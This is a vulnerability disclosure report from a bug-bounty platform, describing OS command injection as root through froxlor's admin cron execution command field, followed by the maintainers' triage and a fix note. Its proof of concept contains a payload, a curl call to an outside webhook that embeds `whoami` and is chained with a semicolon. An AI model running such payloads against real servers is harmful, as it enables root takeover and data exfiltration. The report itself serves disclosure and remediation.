Cron execution command field allows attackers with admin privilege to execute OS command as root in froxlor/froxlor

Valid

Reported on

Dec 19th 2022


Description

  • Cron execution command value is written into cronfile without any security protection mechanism.
  • If an attacker gained admin access, he/she can run OS command as root.

Proof of Concept

1/ Navigate to http://webserver/froxlor/admin_settings.php?page=overview&part=crond

2/ In the Cron execution command field. Paste in a command following with a semicolon. For example:

curl http://<your webhook site>/`whoami`;

image

3/ Cronfile on the server is updated after some minutes

image

4/ The whoami command is executed and returned root user

image

Impact

If an attacker has admin access, he/she can execute OS command as root on the server.

We are processing your report and will contact the froxlor team within 24 hours. a year ago
We have contacted a member of the froxlor team and are waiting to hear back a year ago
Michael
a year ago

Maintainer


Please read our security policy, only reports for the upcoming version 2 can be processed

Michael
a year ago

Maintainer


and by NO means is that a CRITICAL severity as you have to have administrative privileges

Khang Tran modified the report
a year ago
Khang Tran
a year ago

Researcher


Thanks for your feedback. I have updated the report. The reason I thought it was a critical severity is because an attacker can fully compromise the system if successfully exploit this vulnerability.

Michael Kaufmann validated this vulnerability a year ago
benasin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.0-beta1 with commit 795a3d a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation